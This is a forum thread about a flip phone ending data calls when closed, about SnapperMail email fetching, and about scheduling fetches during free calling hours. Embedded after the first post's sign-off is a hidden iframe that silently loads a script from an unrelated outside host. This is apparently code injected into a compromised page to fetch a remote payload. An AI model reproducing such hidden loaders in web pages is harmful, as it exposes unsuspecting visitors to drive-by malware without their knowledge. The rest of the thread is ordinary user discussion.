+ Reply to Thread

Close phone = End of Call?

When I close my phone, my call is immediately terminated. Is there a way to prevent this? When I had my Treo, this was not the behavior of it.

Let me explain why: When I poll SnapperMail (for example) and I have 45 messages queued, I do not want to stand there with my phone open just to download the messages.

What I want is the ability to close the phone, and have the phone get the rest of the messages.

I am NOT using Verizon's Express Net (EN). Just QNC. Would that make a difference?

I did not see anything in Prefs Phone to change this behavior.

Thanks,

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Close phone = End of Call?

Originally posted by zucchero
    When I close my phone, my call is immediately terminated. Is there a way to prevent this? When I had my Treo, this was not the behavior of it.

Let me explain why: When I poll SnapperMail (for example) and I have 45 messages queued, I do not want to stand there with my phone open just to download the messages.

What I want is the ability to close the phone, and have the phone get the rest of the messages.

I am NOT using Verizon's Express Net (EN). Just QNC. Would that make a difference?

I did not see anything in Prefs Phone to change this behavior.

Thanks,

John
    Closing the phone should not end a SnapperMail fetch, either on QNC or EN. I'm not sure exactly how SnapperMail does it, but it just does... I have periodic e-mail fetching set for every 15 minutes every weekday after 6, and all weekend long, and it does its thing, unless I'm on a voice call. If you start a fetch while the phone is open manually, you can still close the phone and it will keep going. Have you tried this and found it to be otherwise?

p.s. The same cannot necessarily be said of all apps that require a data connection. When I am web browsing, if I close the 7135 while it is downloading I'm pretty sure it stops... not because the data connection ends, but because the app isn't able to keep running with the phone closed. At least that's the way it all seems to be happening. When I'm playing around later I'll keep a closer eye on it... but it seems that certain apps are written to be able to run whether the 7135 is opened or closed.
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Close phone = End of Call?

Originally posted by Robert K.
    Closing the phone should not end a SnapperMail fetch, either on QNC or EN. I'm not sure exactly how SnapperMail does it, but it just does... I have periodic e-mail fetching set for every 15 minutes every weekday after 6, and all weekend long, and it does its thing, unless I'm on a voice call. .
    How did you manage this? How did you get it go past midnight? Example, I have "free" nights & weekends, so I want the fetches to start 9:05 and end at 5:55 everyday. I can get it to "swing" around midnight. Also, how did you do "all weekend long"?

Thanks,

John

Re: Re: Re: Close phone = End of Call?

Originally posted by zucchero
    How did you manage this? How did you get it go past midnight? Example, I have "free" nights & weekends, so I want the fetches to start 9:05 and end at 5:55 everyday. I can get it to "swing" around midnight. Also, how did you do "all weekend long"?

Thanks,

John
    Sorry... I didn't mean "all weekend long" literally During the week I have it set from 6:00 p.m. - 11:55 p.m., and on the weekend I have it set from 7:00 a.m. - 11:55 p.m. (and since that's pretty much the entire time I'm awake I call it "all weekend long" :p )
    Please visit my picture site: Robert-O-Rama :)